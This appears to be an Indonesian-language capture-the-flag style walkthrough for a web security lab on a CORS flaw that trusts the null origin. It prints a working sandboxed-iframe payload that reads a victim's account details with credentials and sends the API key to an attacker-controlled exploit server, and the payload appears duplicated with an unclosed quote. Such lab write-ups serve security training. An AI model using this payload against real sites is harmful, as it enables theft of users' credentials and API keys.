June 15, 2026
Lab 17: CORS vulnerability with trusted null origin
Tujuan
Tkacala
1 min read
Tujuan
Website target hanya percaya sama origin null (identitas kosong). Attacker bisa bikin iframe pake sandbox dan srcdoc supaya origin-nya jadi null, lalu curi data API key dari korban.
Langkah 1: Login & Buka Exploit Server
- Buka lab.
- Login dengan wiener : peter.
- Klik tombol "Go to exploit server".
Langkah 2: Buat Kode Exploit dengan srcdoc
Di kolom "Body" exploit server, isi dengan kode berikut:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc='
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get","https://YOUR-LAB-ID.web-security-academy.net/accountDetails",true);
req.withCredentials = true;
req.send();
function reqListener() {
location="https://exploit-YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key="+encodeURIComponent(this.responseText);
};
</script>
</iframe><iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc='
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open("get","https://YOUR-LAB-ID.web-security-academy.net/accountDetails",true);
req.withCredentials = true;
req.send();
function reqListener() {
location="https://exploit-YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key="+encodeURIComponent(this.responseText);
};
</script>
</iframe>- YOUR— LAB — ID dengan Lab ID kamu
- YOUR — EXPLOIT — SERVER — ID sesuai dengan milik mu juga
Langkah 3: Simpan & Test
- Klik "Store".
- Klik "View exploit" untuk test sendiri.
Langkah 4: Kirim ke Korban
- Klik "Deliver to victim".
Langkah 5: Cek Access Log (Test Sendiri)
- Klik "Access log" di exploit server.
- Cari request dari IP kamu sendiri yang berisi
?key=. - Di dalamnya akan ada API key wiener.
Langkah 6: Uraikan di CyberChef
- Buka situs CyberChef
- Paste hasil "log?key=" di kolom CyberChef
- Gunakan URL Decode
Langkah 7: Submit
- Copy Api key yang sudah di decode
- Paste dan submit
- Lab Solved
